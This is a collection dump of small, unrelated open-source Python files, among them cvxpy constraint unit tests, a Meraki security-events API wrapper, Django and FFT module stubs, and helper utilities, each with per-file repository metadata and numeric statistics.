| 51.198044 | 79 | 0.640318 | 11,264 | 83,760 | 4.35245 | 0.043679 | 0.033288 | 0.038347 | 0.036593 | 0.85832 | 0.827663 | 0.796883 | 0.778261 | 0.75358 | 0.734447 | 0 | 0.025498 | 0.248949 | 83,760 | 1,635 | 80 | 51.229358 | 0.753831 | 0.030349 | 0 | 0.653873 | 0 | 0 | 0.223927 | 0.123404 | 0 | 0 | 0 | 0.000612 | 0.0939 | 1 | 0.037697 | false | 0 | 0.015764 | 0 | 0.056888 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9c06b321637de0985d2c8ea5ab3e2543e2b615de | 69 | py | Python | util/__init__.py | zyxia1009/OadTR | ec6e4dafcb465719e80cbf39dcd2099e51927d51 | [
"MIT"
] | 53 | 2021-06-21T14:31:54.000Z | 2022-03-30T14:37:49.000Z | util/__init__.py | zyxia1009/OadTR | ec6e4dafcb465719e80cbf39dcd2099e51927d51 | [
"MIT"
] | 15 | 2021-06-23T06:06:12.000Z | 2022-03-25T14:30:30.000Z | util/__init__.py | zyxia1009/OadTR | ec6e4dafcb465719e80cbf39dcd2099e51927d51 | [
"MIT"
] | 9 | 2021-06-27T04:29:56.000Z | 2022-03-29T07:25:53.000Z | from .logger import *
from .loss import *
from .eval_utils import * | 23 | 25 | 0.724638 | 10 | 69 | 4.9 | 0.6 | 0.408163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.188406 | 69 | 3 | 25 | 23 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9c15234603f7eecb5bde992db9e730db517bfe40 | 161 | py | Python | articles/views.py | lsdlab/dangan | 1d0238d9b83d6d5e42d6f21ac43fa37c81bb34b7 | [
"MIT"
] | 32 | 2017-06-04T13:33:45.000Z | 2021-09-15T10:47:42.000Z | articles/views.py | lsdlab/awesome_coffice | 1d0238d9b83d6d5e42d6f21ac43fa37c81bb34b7 | [
"MIT"
] | 2 | 2018-01-19T08:10:50.000Z | 2018-08-24T02:06:09.000Z | articles/views.py | lsdlab/awesome_coffice | 1d0238d9b83d6d5e42d6f21ac43fa37c81bb34b7 | [
"MIT"
] | 17 | 2017-06-05T04:00:07.000Z | 2019-02-26T07:29:13.000Z | from django.shortcuts import render
# Create your views here.
def articles(request):
return render(request, 'articles/articles.html', {'title': 'articles'})
| 23 | 73 | 0.745342 | 20 | 161 | 6 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.124224 | 161 | 6 | 74 | 26.833333 | 0.851064 | 0.142857 | 0 | 0 | 0 | 0 | 0.257353 | 0.161765 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
9c596b48e817e4de3d5deb15f9ed27bbbe2f812c | 93 | py | Python | tests/core/test_import.py | njgheorghita/devcon-iv-ethpm | 3cbd1dd64fdbfb787f89cd369acb6f3d36893817 | [
"MIT"
] | 4 | 2018-11-01T12:17:09.000Z | 2018-11-01T13:58:27.000Z | tests/core/test_import.py | njgheorghita/devcon-iv-ethpm | 3cbd1dd64fdbfb787f89cd369acb6f3d36893817 | [
"MIT"
] | null | null | null | tests/core/test_import.py | njgheorghita/devcon-iv-ethpm | 3cbd1dd64fdbfb787f89cd369acb6f3d36893817 | [
"MIT"
] | null | null | null | def test_import():
import devcon_iv_ethpm # noqa: F401
import web3
import ethpm
| 18.6 | 40 | 0.688172 | 13 | 93 | 4.692308 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057971 | 0.258065 | 93 | 4 | 41 | 23.25 | 0.826087 | 0.107527 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 1 | 0 | 1.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9c7b715b7c8b109e14a58beb7f440e7e6dc3caf9 | 662 | py | Python | Lib/site-packages/numarray/fft/__init__.py | raychorn/svn_Python-2.5.1 | 425005b1b489ba44ec0bb989e077297e8953d9be | [
"PSF-2.0"
] | null | null | null | Lib/site-packages/numarray/fft/__init__.py | raychorn/svn_Python-2.5.1 | 425005b1b489ba44ec0bb989e077297e8953d9be | [
"PSF-2.0"
] | null | null | null | Lib/site-packages/numarray/fft/__init__.py | raychorn/svn_Python-2.5.1 | 425005b1b489ba44ec0bb989e077297e8953d9be | [
"PSF-2.0"
] | null | null | null | """
Discrete Fourier Transforms - FFT.py
The underlying code for these functions is an f2c translated and modified
version of the FFTPACK routines.
fft(a, n=None, axis=-1)
inverse_fft(a, n=None, axis=-1)
real_fft(a, n=None, axis=-1)
inverse_real_fft(a, n=None, axis=-1)
hermite_fft(a, n=None, axis=-1)
inverse_hermite_fft(a, n=None, axis=-1)
fftnd(a, s=None, axes=None)
inverse_fftnd(a, s=None, axes=None)
real_fftnd(a, s=None, axes=None)
inverse_real_fftnd(a, s=None, axes=None)
fft2d(a, s=None, axes=(-2,-1))
inverse_fft2d(a, s=None, axes=(-2, -1))
real_fft2d(a, s=None, axes=(-2,-1))
inverse_real_fft2d(a, s=None, axes=(-2, -1))
"""
from FFT import *
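# A minimal, hypothetical round-trip sketch (illustration only, not part of
# the original package): fft and inverse_fft operate along the last axis and
# should invert each other up to floating-point error.
#
#     >>> import numarray
#     >>> x = numarray.arange(8.0)
#     >>> y = fft(x)                     # complex spectrum of length 8
#     >>> numarray.allclose(inverse_fft(y).real, x)
#     1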
| 28.782609 | 73 | 0.697885 | 128 | 662 | 3.492188 | 0.28125 | 0.035794 | 0.107383 | 0.178971 | 0.704698 | 0.704698 | 0.630872 | 0.163311 | 0 | 0 | 0 | 0.032646 | 0.120846 | 662 | 22 | 74 | 30.090909 | 0.735395 | 0.959215 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
92d870bf9400de7752db1e28ba92a9518d2841ca | 9,518 | py | Python | cvxpy/tests/test_constraints.py | quantopian/cvxpy | 7deee4d172470aa8f629dab7fead50467afa75ff | [
"Apache-2.0"
] | 5 | 2017-08-31T01:37:00.000Z | 2022-03-24T04:23:09.000Z | cvxpy/tests/test_constraints.py | quantopian/cvxpy | 7deee4d172470aa8f629dab7fead50467afa75ff | [
"Apache-2.0"
] | null | null | null | cvxpy/tests/test_constraints.py | quantopian/cvxpy | 7deee4d172470aa8f629dab7fead50467afa75ff | [
"Apache-2.0"
] | 6 | 2017-02-09T19:37:07.000Z | 2021-01-07T00:17:54.000Z | """
Copyright 2017 Steven Diamond
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cvxpy.expressions.variables import Variable
from cvxpy.constraints.second_order import SOC
from cvxpy.tests.base_test import BaseTest
import numpy as np
import sys
PY2 = sys.version_info < (3, 0)
class TestConstraints(BaseTest):
""" Unit tests for the expression/expression module. """
def setUp(self):
self.a = Variable(name='a')
self.b = Variable(name='b')
self.x = Variable(2, name='x')
self.y = Variable(3, name='y')
self.z = Variable(2, name='z')
self.A = Variable(2, 2, name='A')
self.B = Variable(2, 2, name='B')
self.C = Variable(3, 2, name='C')
def test_constr_str(self):
"""Test string representations of the constraints.
"""
constr = self.x <= self.x
self.assertEqual(repr(constr), "LeqConstraint(%s, %s)" % (repr(self.x), repr(self.x)))
constr = self.x <= 2*self.x
self.assertEqual(repr(constr), "LeqConstraint(%s, %s)" % (repr(self.x), repr(2*self.x)))
constr = 2*self.x >= self.x
self.assertEqual(repr(constr), "LeqConstraint(%s, %s)" % (repr(self.x), repr(2*self.x)))
def test_eq_constraint(self):
"""Test the EqConstraint class.
"""
constr = self.x == self.z
self.assertEqual(constr.name(), "x == z")
self.assertEqual(constr.size, (2, 1))
# self.assertItemsEqual(constr.variables().keys(), [self.x.id, self.z.id])
# Test value and dual_value.
assert constr.dual_value is None
assert constr.value is None
self.x.save_value([2,2])
self.z.save_value([2,2])
assert constr.value
self.x.save_value([3,3])
assert not constr.value
self.x.value = [2, 1]
self.z.value = [2, 2]
assert not constr.value
self.assertItemsAlmostEqual(constr.violation, [0, 1])
self.assertItemsAlmostEqual(constr.residual.value, [0, 1])
self.z.value = [2, 1]
assert constr.value
self.assertItemsAlmostEqual(constr.violation, [0, 0])
self.assertItemsAlmostEqual(constr.residual.value, [0, 0])
with self.assertRaises(Exception) as cm:
(self.x == self.y)
self.assertEqual(str(cm.exception), "Incompatible dimensions (2, 1) (3, 1)")
# Test copy with args=None
copy = constr.copy()
self.assertTrue(type(copy) is type(constr))
# A new object is constructed, so copy.args == constr.args but copy.args
# is not constr.args.
self.assertEqual(copy.args, constr.args)
self.assertFalse(copy.args is constr.args)
# Test copy with new args
copy = constr.copy(args=[self.A, self.B])
self.assertTrue(type(copy) is type(constr))
self.assertTrue(copy.args[0] is self.A)
self.assertTrue(copy.args[1] is self.B)
def test_leq_constraint(self):
"""Test the LeqConstraint class.
"""
constr = self.x <= self.z
self.assertEqual(constr.name(), "x <= z")
self.assertEqual(constr.size, (2, 1))
# Test value and dual_value.
assert constr.dual_value is None
assert constr.value is None
self.x.save_value([1,1])
self.z.save_value([2,2])
assert constr.value
self.x.save_value([3,3])
assert not constr.value
# self.assertItemsEqual(constr.variables().keys(), [self.x.id, self.z.id])
self.x.value = [2, 1]
self.z.value = [2, 0]
assert not constr.value
self.assertItemsAlmostEqual(constr.violation, [0, 1])
self.assertItemsAlmostEqual(constr.residual.value, [0, 1])
self.z.value = [2, 2]
assert constr.value
self.assertItemsAlmostEqual(constr.violation, [0, 0])
self.assertItemsAlmostEqual(constr.residual.value, [0, 0])
with self.assertRaises(Exception) as cm:
(self.x <= self.y)
self.assertEqual(str(cm.exception), "Incompatible dimensions (2, 1) (3, 1)")
# Test copy with args=None
copy = constr.copy()
self.assertTrue(type(copy) is type(constr))
# A new object is constructed, so copy.args == constr.args but copy.args
# is not constr.args.
self.assertEqual(copy.args, constr.args)
self.assertFalse(copy.args is constr.args)
# Test copy with new args
copy = constr.copy(args=[self.A, self.B])
self.assertTrue(type(copy) is type(constr))
self.assertTrue(copy.args[0] is self.A)
self.assertTrue(copy.args[1] is self.B)
def test_psd_constraint(self):
"""Test the PSD constraint <<.
"""
constr = self.A >> self.B
self.assertEqual(constr.name(), "A >> B")
self.assertEqual(constr.size, (2, 2))
# Test value and dual_value.
assert constr.dual_value is None
assert constr.value is None
self.A.save_value(np.matrix("2 -1; 1 2"))
self.B.save_value(np.matrix("1 0; 0 1"))
assert constr.value
self.assertAlmostEqual(constr.violation, 0)
self.assertAlmostEqual(constr.residual.value, 0)
self.B.save_value(np.matrix("3 0; 0 3"))
assert not constr.value
self.assertAlmostEqual(constr.violation, 1)
self.assertAlmostEqual(constr.residual.value, 1)
with self.assertRaises(Exception) as cm:
(self.x >> self.y)
self.assertEqual(str(cm.exception), "Non-square matrix in positive definite constraint.")
# Test copy with args=None
copy = constr.copy()
self.assertTrue(type(copy) is type(constr))
# A new object is constructed, so copy.args == constr.args but copy.args
# is not constr.args.
self.assertEqual(copy.args, constr.args)
self.assertFalse(copy.args is constr.args)
# Test copy with new args
copy = constr.copy(args=[self.B, self.A])
self.assertTrue(type(copy) is type(constr))
self.assertTrue(copy.args[0] is self.B)
self.assertTrue(copy.args[1] is self.A)
def test_nsd_constraint(self):
"""Test the PSD constraint <<.
"""
constr = self.A << self.B
self.assertEqual(constr.name(), "B >> A")
self.assertEqual(constr.size, (2, 2))
# Test value and dual_value.
assert constr.dual_value is None
assert constr.value is None
self.B.save_value(np.matrix("2 -1; 1 2"))
self.A.save_value(np.matrix("1 0; 0 1"))
assert constr.value
self.A.save_value(np.matrix("3 0; 0 3"))
assert not constr.value
with self.assertRaises(Exception) as cm:
(self.x << self.y)
self.assertEqual(str(cm.exception), "Non-square matrix in positive definite constraint.")
def test_lt(self):
"""Test the < operator.
"""
constr = self.x < self.z
self.assertEqual(constr.name(), "x <= z")
self.assertEqual(constr.size, (2, 1))
with self.assertRaises(Exception) as cm:
(self.x < self.y)
self.assertEqual(str(cm.exception), "Incompatible dimensions (2, 1) (3, 1)")
def test_geq(self):
"""Test the >= operator.
"""
constr = self.z >= self.x
self.assertEqual(constr.name(), "x <= z")
self.assertEqual(constr.size, (2, 1))
with self.assertRaises(Exception) as cm:
(self.y >= self.x)
self.assertEqual(str(cm.exception), "Incompatible dimensions (2, 1) (3, 1)")
def test_gt(self):
"""Test the > operator.
"""
constr = self.z > self.x
self.assertEqual(constr.name(), "x <= z")
self.assertEqual(constr.size, (2, 1))
with self.assertRaises(Exception) as cm:
(self.y > self.x)
self.assertEqual(str(cm.exception), "Incompatible dimensions (2, 1) (3, 1)")
# Test the SOC class.
def test_soc_constraint(self):
exp = self.x + self.z
scalar_exp = self.a + self.b
constr = SOC(scalar_exp, [exp])
self.assertEqual(constr.size, (3, 1))
def test_chained_constraints(self):
"""Tests that chaining constraints raises an error.
"""
error_str = ("Cannot evaluate the truth value of a constraint or "
"chain constraints, e.g., 1 >= x >= 0.")
with self.assertRaises(Exception) as cm:
(self.z <= self.x <= 1)
self.assertEqual(str(cm.exception), error_str)
with self.assertRaises(Exception) as cm:
(self.x == self.z == 1)
self.assertEqual(str(cm.exception), error_str)
if PY2:
with self.assertRaises(Exception) as cm:
(self.z <= self.x).__nonzero__()
self.assertEqual(str(cm.exception), error_str)
else:
with self.assertRaises(Exception) as cm:
(self.z <= self.x).__bool__()
self.assertEqual(str(cm.exception), error_str)
| 37.472441 | 97 | 0.604224 | 1,285 | 9,518 | 4.432685 | 0.128405 | 0.033357 | 0.030021 | 0.056004 | 0.772647 | 0.752107 | 0.735077 | 0.716643 | 0.703125 | 0.6796 | 0 | 0.019846 | 0.264131 | 9,518 | 253 | 98 | 37.620553 | 0.793404 | 0.173986 | 0 | 0.547619 | 0 | 0 | 0.06885 | 0 | 0 | 0 | 0 | 0 | 0.535714 | 1 | 0.065476 | false | 0 | 0.029762 | 0 | 0.10119 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
136bf557859c4302dd1e81901e051d3bc91e5c69 | 252 | py | Python | tests/log.py | git-akihakune/aWaifu-web | bc6774d96b9f3b2ffe673f960786d93c827685a3 | [
"MIT"
] | null | null | null | tests/log.py | git-akihakune/aWaifu-web | bc6774d96b9f3b2ffe673f960786d93c827685a3 | [
"MIT"
] | null | null | null | tests/log.py | git-akihakune/aWaifu-web | bc6774d96b9f3b2ffe673f960786d93c827685a3 | [
"MIT"
] | null | null | null | from .config import verbose
def failed(skk): print("\033[91m[FAILED] \033[00m{}".format(skk))
def passed(skk): print("\033[92m[PASSED] \033[00m{}".format(skk))
def notify(skk):
if verbose:
print("\033[96m[NOTIFY] \033[00m{}".format(skk)) | 28 | 65 | 0.650794 | 39 | 252 | 4.205128 | 0.435897 | 0.146341 | 0.219512 | 0.27439 | 0.219512 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 0.126984 | 252 | 9 | 66 | 28 | 0.609091 | 0 | 0 | 0 | 0 | 0 | 0.320158 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.166667 | 0.166667 | 0 | 0.666667 | 0.5 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 6 |
13794bf5de79f4d48d30aaf8063373b9342d0446 | 6,886 | py | Python | meraki_v0/api/security_events.py | zabrewer/dashboard-api-python | bc21b6852e3167dcdf79585928a963efebb9d0ee | [
"MIT"
] | 2 | 2020-01-09T08:35:39.000Z | 2020-01-09T09:23:53.000Z | meraki_v0/api/security_events.py | zabrewer/dashboard-api-python | bc21b6852e3167dcdf79585928a963efebb9d0ee | [
"MIT"
] | null | null | null | meraki_v0/api/security_events.py | zabrewer/dashboard-api-python | bc21b6852e3167dcdf79585928a963efebb9d0ee | [
"MIT"
] | null | null | null | class SecurityEvents(object):
def __init__(self, session):
super(SecurityEvents, self).__init__()
self._session = session
def getNetworkClientSecurityEvents(self, networkId: str, clientId: str, total_pages=1, direction='next', **kwargs):
"""
**List the security events for a client. Clients can be identified by a client key or either the MAC or IP depending on whether the network uses Track-by-IP.**
https://api.meraki.com/api_docs#list-the-security-events-for-a-client
- networkId (string)
- clientId (string)
- total_pages (integer or string): total number of pages to retrieve, -1 or "all" for all pages
- direction (string): direction to paginate, either "next" (default) or "prev" page
- t0 (string): The beginning of the timespan for the data. The maximum lookback period is 791 days from today.
- t1 (string): The end of the timespan for the data. t1 can be a maximum of 791 days after t0.
- timespan (number): The timespan for which the information will be fetched. If specifying timespan, do not specify parameters t0 and t1. The value must be in seconds and be less than or equal to 791 days. The default is 31 days.
- perPage (integer): The number of entries per page returned. Acceptable range is 3 - 1000. Default is 100.
- startingAfter (string): A token used by the server to indicate the start of the page. Often this is a timestamp or an ID but it is not limited to those. This parameter should not be defined by client applications. The link for the first, last, prev, or next page in the HTTP Link header should define it.
- endingBefore (string): A token used by the server to indicate the end of the page. Often this is a timestamp or an ID but it is not limited to those. This parameter should not be defined by client applications. The link for the first, last, prev, or next page in the HTTP Link header should define it.
"""
kwargs.update(locals())
metadata = {
'tags': ['Security events'],
'operation': 'getNetworkClientSecurityEvents',
}
resource = f'/networks/{networkId}/clients/{clientId}/securityEvents'
query_params = ['t0', 't1', 'timespan', 'perPage', 'startingAfter', 'endingBefore']
params = {k: v for (k, v) in kwargs.items() if k in query_params}
return self._session.get_pages(metadata, resource, params, total_pages, direction)
def getNetworkSecurityEvents(self, networkId: str, total_pages=1, direction='next', **kwargs):
"""
**List the security events for a network**
https://api.meraki.com/api_docs#list-the-security-events-for-a-network
- networkId (string)
- total_pages (integer or string): total number of pages to retrieve, -1 or "all" for all pages
- direction (string): direction to paginate, either "next" (default) or "prev" page
- t0 (string): The beginning of the timespan for the data. The maximum lookback period is 365 days from today.
- t1 (string): The end of the timespan for the data. t1 can be a maximum of 365 days after t0.
- timespan (number): The timespan for which the information will be fetched. If specifying timespan, do not specify parameters t0 and t1. The value must be in seconds and be less than or equal to 365 days. The default is 31 days.
- perPage (integer): The number of entries per page returned. Acceptable range is 3 - 1000. Default is 100.
- startingAfter (string): A token used by the server to indicate the start of the page. Often this is a timestamp or an ID but it is not limited to those. This parameter should not be defined by client applications. The link for the first, last, prev, or next page in the HTTP Link header should define it.
- endingBefore (string): A token used by the server to indicate the end of the page. Often this is a timestamp or an ID but it is not limited to those. This parameter should not be defined by client applications. The link for the first, last, prev, or next page in the HTTP Link header should define it.
"""
kwargs.update(locals())
metadata = {
'tags': ['Security events'],
'operation': 'getNetworkSecurityEvents',
}
resource = f'/networks/{networkId}/securityEvents'
query_params = ['t0', 't1', 'timespan', 'perPage', 'startingAfter', 'endingBefore']
params = {k: v for (k, v) in kwargs.items() if k in query_params}
return self._session.get_pages(metadata, resource, params, total_pages, direction)
def getOrganizationSecurityEvents(self, organizationId: str, total_pages=1, direction='next', **kwargs):
"""
**List the security events for an organization**
https://api.meraki.com/api_docs#list-the-security-events-for-an-organization
- organizationId (string)
- total_pages (integer or string): total number of pages to retrieve, -1 or "all" for all pages
- direction (string): direction to paginate, either "next" (default) or "prev" page
- t0 (string): The beginning of the timespan for the data. The maximum lookback period is 365 days from today.
- t1 (string): The end of the timespan for the data. t1 can be a maximum of 365 days after t0.
- timespan (number): The timespan for which the information will be fetched. If specifying timespan, do not specify parameters t0 and t1. The value must be in seconds and be less than or equal to 365 days. The default is 31 days.
- perPage (integer): The number of entries per page returned. Acceptable range is 3 - 1000. Default is 100.
- startingAfter (string): A token used by the server to indicate the start of the page. Often this is a timestamp or an ID but it is not limited to those. This parameter should not be defined by client applications. The link for the first, last, prev, or next page in the HTTP Link header should define it.
- endingBefore (string): A token used by the server to indicate the end of the page. Often this is a timestamp or an ID but it is not limited to those. This parameter should not be defined by client applications. The link for the first, last, prev, or next page in the HTTP Link header should define it.
"""
kwargs.update(locals())
metadata = {
'tags': ['Security events'],
'operation': 'getOrganizationSecurityEvents',
}
resource = f'/organizations/{organizationId}/securityEvents'
query_params = ['t0', 't1', 'timespan', 'perPage', 'startingAfter', 'endingBefore']
params = {k: v for (k, v) in kwargs.items() if k in query_params}
return self._session.get_pages(metadata, resource, params, total_pages, direction)
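# A hypothetical usage sketch (the DashboardAPI entry point and attribute
# names below are assumptions, not defined in this module): all three methods
# share the same pagination contract via self._session.get_pages.
#
#     import meraki_v0
#     dashboard = meraki_v0.DashboardAPI(api_key='...')
#     events = dashboard.security_events.getNetworkSecurityEvents(
#         'N_12345', total_pages='all', timespan=86400, perPage=1000)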
| 70.989691 | 314 | 0.686175 | 1,000 | 6,886 | 4.692 | 0.147 | 0.012788 | 0.026854 | 0.026854 | 0.880009 | 0.880009 | 0.880009 | 0.8685 | 0.8685 | 0.8685 | 0 | 0.016455 | 0.23221 | 6,886 | 96 | 315 | 71.729167 | 0.871004 | 0.662939 | 0 | 0.529412 | 0 | 0 | 0.226606 | 0.11128 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
137d3988fbdf887f40a59947b18d96d8d1352ff5 | 59 | py | Python | python-aliyun-api-gateway/aliyun/api/gateway/sdk/util/UUIDUtil.py | coco369/aliyun-api-gateway-python | 683a70786e36d1a089ec48da80b59b1f882f2976 | [
"Apache-2.0"
] | 2 | 2020-09-09T10:09:44.000Z | 2021-05-13T06:35:32.000Z | python-aliyun-api-gateway/aliyun/api/gateway/sdk/util/UUIDUtil.py | coco369/aliyun-api-gateway-python | 683a70786e36d1a089ec48da80b59b1f882f2976 | [
"Apache-2.0"
] | null | null | null | python-aliyun-api-gateway/aliyun/api/gateway/sdk/util/UUIDUtil.py | coco369/aliyun-api-gateway-python | 683a70786e36d1a089ec48da80b59b1f882f2976 | [
"Apache-2.0"
] | null | null | null | import uuid
def get_uuid():
return str(uuid.uuid4())
| 9.833333 | 28 | 0.661017 | 9 | 59 | 4.222222 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021277 | 0.20339 | 59 | 5 | 29 | 11.8 | 0.787234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 6 |
b9286c72678bcc6eaa0ed8c14639473032405a0e | 22 | py | Python | IPython/testing/plugin/simplevars.py | dchichkov/ipython | 8096bb8640ee7e7c5ebdf3f428fe69cd390e1cd4 | [
"BSD-3-Clause-Clear"
] | 26 | 2018-02-14T23:52:58.000Z | 2021-08-16T13:50:03.000Z | IPython/testing/plugin/simplevars.py | dchichkov/ipython | 8096bb8640ee7e7c5ebdf3f428fe69cd390e1cd4 | [
"BSD-3-Clause-Clear"
] | 3 | 2015-04-01T13:14:57.000Z | 2015-05-26T16:01:37.000Z | IPython/testing/plugin/simplevars.py | dchichkov/ipython | 8096bb8640ee7e7c5ebdf3f428fe69cd390e1cd4 | [
"BSD-3-Clause-Clear"
] | 10 | 2018-08-13T19:38:39.000Z | 2020-04-19T03:02:00.000Z | x = 1
print('x is:', x)
| 7.333333 | 15 | 0.5 | 6 | 22 | 1.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0.272727 | 22 | 2 | 16 | 11 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0.227273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.5 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
b92d1784202e284af1eb520ae5d1efa1ecdba4b1 | 379 | py | Python | Gds/src/fprime_gds/wxgui/GDS_WXFormBuilderFiles/GDSStatusPanelImpl.py | hunterpaulson/fprime | 70560897b56dc3037dc966c99751b708b1cc8a05 | [
"Apache-2.0"
] | null | null | null | Gds/src/fprime_gds/wxgui/GDS_WXFormBuilderFiles/GDSStatusPanelImpl.py | hunterpaulson/fprime | 70560897b56dc3037dc966c99751b708b1cc8a05 | [
"Apache-2.0"
] | 5 | 2020-07-13T16:56:33.000Z | 2020-07-23T20:38:13.000Z | Gds/src/fprime_gds/wxgui/GDS_WXFormBuilderFiles/GDSStatusPanelImpl.py | hunterpaulson/lgtm-fprime | 9eeda383c263ecba8da8188a45e1d020107ff323 | [
"Apache-2.0"
] | null | null | null | import wx
import GDSStatusPanelGUI
###########################################################################
## Class StatusImpl
###########################################################################
class StatusImpl(GDSStatusPanelGUI.Status):
def __init__(self, parent):
GDSStatusPanelGUI.Status.__init__(self, parent)
def __del__(self):
pass
| 25.266667 | 75 | 0.432718 | 23 | 379 | 6.608696 | 0.521739 | 0.197368 | 0.184211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.124011 | 379 | 14 | 76 | 27.071429 | 0.457831 | 0.042216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0.142857 | 0.285714 | 0 | 0.714286 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
b960ad4750e4340522df6751a76001a9bb7945fb | 44 | py | Python | enthought/traits/ui/theme.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | 3 | 2016-12-09T06:05:18.000Z | 2018-03-01T13:00:29.000Z | enthought/traits/ui/theme.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | 1 | 2020-12-02T00:51:32.000Z | 2020-12-02T08:48:55.000Z | enthought/traits/ui/theme.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | null | null | null | # proxy module
from traitsui.theme import *
